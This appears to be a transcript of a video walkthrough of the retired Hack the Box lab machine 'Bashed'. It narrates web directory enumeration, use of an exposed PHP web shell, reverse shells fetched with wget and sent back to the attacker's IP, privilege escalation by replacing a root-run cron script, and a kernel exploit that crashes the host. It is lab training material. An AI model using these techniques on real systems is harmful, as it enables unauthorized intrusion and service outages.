Welcome back. This is Mike from Digital Offensive, and today we're going to take a look at Bashed from Hack the Box. At the current time, Bash is now retired and is no longer scoreable. Those who are VIP members can go back and check out Bash as they wish. In its heyday, Bash was one of the easier boxes, one of the first boxes many people went for, and because of this reason, this box was often left unstable or was constantly being rebooted. And what I want to go through today is two techniques to get root. And one of the techniques is the reason why I think the box was constantly being in a hung state or constantly getting rebooted. So the original author had originally planned for you to use a configuration, maybe a misconfiguration issue to gain root access. But the box is also vulnerable to a kernel exploit that will allow you to get access, but the kernel exploit leaves the box in an unstable state, and often the box crashes. So I'm going to show you how to use both techniques to get to the root flag in this video. So first, let's do some enumeration. As we know, Bash sits at 10.10.10.68, and some of the first things we see right off the bat is when we go out to the website, if we check out the blog posting, right, it says HTB Bashed helps a lot with pen testing. I've tested on multiple different servers and it was very useful. I actually developed it on this exact server. So here you have a developer developing code on a production server. Believe me, this happens in real life too. It shouldn't, but it does. So me reading this line, I believe his code is going to be somewhere on this site. Also being a developer, I'm going to make an assumption that it's probably sitting in a dev directory. Some of the things we can look at right here on this main page before we even get over to running any of our enumeration scripts is, according to this image, it looks like /uploads, according to this image, stores that file. So let's check /uploads. Alright, so if we go to /uploads, we're kind of disappointed there's nothing there. Not a problem, right? Let's go back with my assumption of /dev. And lo and behold, we find the local scripts here. When we run a netcat, when we run an mmap, all we come back was port 80. So I'm not going to bother running another mmap of the box. One of the things we can do too, if you guys' brain doesn't think this way, or for some reason you're having problems figuring out what directories to look for, there's multiple directory enumeration tools, Derby, Dirbuster, GoBuster, WFuzz, a bunch of other ones out there that you guys can look at for directory enumeration for web applications. So I like to use Derby. I found Dirbuster helped me in some occasions, and I'm just starting to really dabble with GoBuster. I'm finding GoBuster to be a little bit better for some challenges than others. And so what we're going to do here is we're going to do Derby. We're going to put the URL 68, right? We're going to assign it a word list to use. And I'm going to use a small list. Derby has a bunch of word lists in its directory. A common one that's really helpful, a very large one called big, and you have the small one. It also has some other scripts in there too. Make sure you check them all out. See which one's helpful to you. So we're going to kick it off. You can see over here it's going through all these possible directories looking for anything that comes back as a 200 response. Basically anything that's not an error page, it's going to look for. So we see that I found a CSS directory, and you can also see that we found the dev directory. So when we open up the dev directory, we have access to the scripts. So I'm going to kill that. And I'm going to click on this one, right? As soon as we come in, we see that we're the user www data, and we're on the bash, and we have a PHP web shell. If we do a print working directory, you can see that it matches up with where we're at. So let's do a cat/etc/password. We see that there's two users on this box. Both of them look like they might have sudo access or some higher level of access to this. Let's go check their home directory, see if we have access to them. So we have cd rexel. All right, and lo and behold, there's the file we want. And look at that, we can read the file. Way to go, locking down your Linux box. So cat user.txt. Bam, already we got the user flag. Took a few seconds. I think the first blood for this one was less than a minute, or maybe it was 2 minutes. Some other interesting stuff in here. Let's see here. Let's see cat sudo. Alright, so it doesn't look like there's anything in there. Yeah. Alright. So let's check out Script Manager. Oops. Alright, so it's a really interesting Script Manager. cd /down. Alright, so we checked out those couple things. We can do some additional enumeration. I like to use linenum and Linux Probe Checker are two of my favorite automation scripts for enumerating Linux. But one of the first commands I like to use a lot, just to roll it out right away, is sudo -l. See what type of access we have with this shell. And you'd be surprised how often you actually have... how often on these CTF type sites or these other lab type sites, sudo is actually the way to get into things. So you can see by default, www.data can run commands as script manager for the group script manager. So not using password, I can basically run as script manager and execute commands with the group script manager. So what we would do here is we can search around for files that are owned by Script Manager, right? So we can use a find command to do that. We can just poke around, looking at some of the key areas. One of the things I noticed, though, right here in the root directory, is I noticed a scripts folder, and that's not common on Ubuntu. So when I noticed that folder, I ran an ls-la. And this is where it's really important to understand the operating systems you're looking at and what's common and what's not common to really help quickly identify the smoking gun or the red herring, the item you want to go chasing. So right here, I can see Script Manager, right? So let's try to go into Script Manager. Alright, so I can't get in there. But I know as the user, I can run commands as that user using sudo. So before we start doing that, let's actually get a better shell in this box. So I'm going to jump over to the temp directory. I'm going to pull down a bash shell from my, a PHP shell from my web server. And I probably could just do a simple back pipe here right now and get that to work. But I like using the bash one. I find it a little bit stabler. I don't have to deal with syntax issues importing into this shell in case the shell parses any of those characters funky. I just know this works and it's stable. Alright, so we're going to do mv bash.txt bash.php. I'm going to set my listener nc-lvp4443. Now, if you know me, I don't normally use odd ports like 4443. I usually use very common ports like 443. It's what's in the script. I didn't feel like modifying the script, and it works. If it didn't work, I would go in and modify the script. And lo and behold, you can see over here we have a shell. Now, that shell is not a full TTY window, so we're going to grab this over here and paste that in. Now, if you ever had issues spawning a TTY window, definitely check out Netsek's post. He has a whole bunch of different ways to spawn a TTY shell. Most of them work pretty well, and it allows you to have better access as you're trying to go through your shell especially if it's not a full shell that you got, like if it's a PHP shell or some other type. So now that we're this user, let's see what we can do. And now that we're www data with a real shell, let's see what we can do. So I know I can run commands as script manager, right? So sudo-u script manager. So now I can execute as script manager. Let's do ls-lai/script and see what comes back. So in here, I see a test.py and test.txt. Test.txt is owned by root and it's only writable by root, which is interesting. And script manager is owned by script manager and is read-write by script manager and read by everyone else. So if we do a sudo, another thing I find interesting here too is the time and the date. So right now it is 1938, April 26, 1938. My local time is 2240. Let's see what happens if we run this again. And you can see the time incremented. So there's something running on this box that is basically running as root because now it's able to write to this file. And this file is getting updated. So let's see what these files are. All right. So test.txt has testing 1, 2, 3 exclamation mark. And test.py is a Python script that's basically opening the file test.txt, writing to the file, not appending, just writing. So basically it's overwriting the content each time. And then it's writing testing 1, 2, 3 exclamation mark to the file, and then it's closing the file out. So looking at this, we can pretty much assume that root is executing test.py and is outputting that file because it would need to be running as root or someone with elevated privileges to be able to write to test.txt. So what I'm going to do here is let's make a backup copy or rename test.py, see if we can replace test.py with our copy of test.py. So I'm going to do paste mv/scripts test.py/scripts/test.bk, and that worked. So on my local host, what I did here, right, is I created my own test.py. So if I do cat test.py, you can see basically I'm using import OS system, and executing a backpipe command to send me a netcat shell back to my IP on port 443. So in theory, if this is getting executed as root, I will get a root shell back. So let's do this. We're going to do nc-lvp 443. So that's listening. We're going to back over here. I'm going to paste. Actually, first thing we're going to do is we're going to cd the temp. We're going to do a wget http /10.10.14.10/test.py. And then we're going to copy that file over to the scripts directory. All right. Now, in theory, within a minute or two, we should get our shell to come back. And look at that. So we got our root shell. Comes back to us. If you go to cd/root, we can do a cat root.txt. And we have our root flag now. All right. So now that we have a root flag, right, we'll kill our root shell. I want to show you the other method you can use without using the sudo and just going right after the kernel exploit. If you do a uname-a on this box, you're going to see it's running 4.4.062 generic. It's Ubuntu. So first time I came into this box, I went through my normal enumeration. I downloaded Linux proof checker, and I basically ran both of those scripts, went through the output of those scripts, and basically started doing searching for local privilege exploits using that information. It wasn't until later I went back and re-reviewed the linenum one. I saw the sudo access, and I was like, oh man, I bet you that's the proper way to do it. So I came back and redid it that way. Using Linux proof checker, at the bottom of it, it tells you some of the kernel exploits you can use. But going out to exploit DB, or if you want to just use your local machine, you can use search exploit. But what I did is I did Ubuntu local priv escalation, and what I used here was the double free privilege escalation. Now, the problem with the privilege escalation, anytime you're messing with kernels, is there's a good chance you can leave the box in a hung state, and that doesn't help you. In pen testing, it leaves the machine unstable, you'll lose your access, you'll take down a production box. It's not good. In these labs, you can get away with it a little bit more, but using this, it definitely takes the box down. So what I did here is, in this code should give you a root prompt if it doesn't crash. But since it seems to crash almost instantly after you run it, what I did is, down here where it calls get root function, so up here it has all the stuff to get root, and then it calls get roots, I put right in here a system call. And that system call basically does a cat/root/root.txt and echoes it to my screen. So that's how I first got root access on this box, or at least the root flag on this box. Kind of cheating, but it was a way to CTF the game and be able to get the flag. So let's take a look at this. Jump over here in my HTML directory. I'm going to do rm bashed. I'm going to do cat ub.c, and I'm going to do pipe grep root.txt. So you can see system cat/root/root.txt, and basically what I'm going to do is I'm going to compile that exploit. I'm going to come over here, and we're in our temp directory, right? And I'm going to download that wget http://10.10.14.10 mashed. Boom, it downloads. Chmod it so I can execute it. Now, as soon as we run this, the box is going to die after we get the flag. All right, so we got our flag. So now we have our root flag, and you can see the box is no longer responding. If we go over to the web page, hit refresh, you'll see it try and connecting. Eventually times out. So what I need to do is go back in and reset the box. Yep, see it connects and times out. I'll go back in and reset the box so someone else can go in and have a good time trying to get access to Bash. Bash was one of the easier boxes out there. A lot of new people went after it. Hopefully this video helped those who still have some problems with it. Definitely, if you get stuck, look at your enumeration processes. Look at how you can better that. Enumeration is key in all these challenges. I gotta say, some stuff in Hack the Box is a little bit more challenging than other places just because they really CTFerized a lot of the challenges out here. They added a whole gaming element to the normal hacker space, hacking boxes type mentality, which is interesting at times and frustrating at others. If you like this video, make sure you subscribe, like it, share it with your friends. Your likes, your comments makes me more motivated to post more content. I have been seeing I've been getting a lot of new users lately, so I really do need to get some more content out there for you guys. So stay tuned as I try to find some time to do that. Just been really swamped with work, study, and family. Most of you guys know how that is. So once again, like the video, subscribe, and share it with your friends.